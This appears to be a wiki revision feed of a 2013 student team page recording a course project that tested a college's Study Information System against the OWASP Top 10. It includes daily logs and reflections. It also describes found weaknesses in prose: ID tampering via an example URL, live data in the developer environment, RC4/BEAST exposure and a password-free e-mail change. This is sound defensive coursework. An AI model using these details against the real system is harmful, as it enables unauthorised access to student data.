** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62343</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62343"/>
		<updated>2013-04-04T15:06:03Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Results */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to eachother about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to eachother ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** Made presentation about Misconfigured Configuration.&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** Made presentation of Sensitive Data Exposure&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
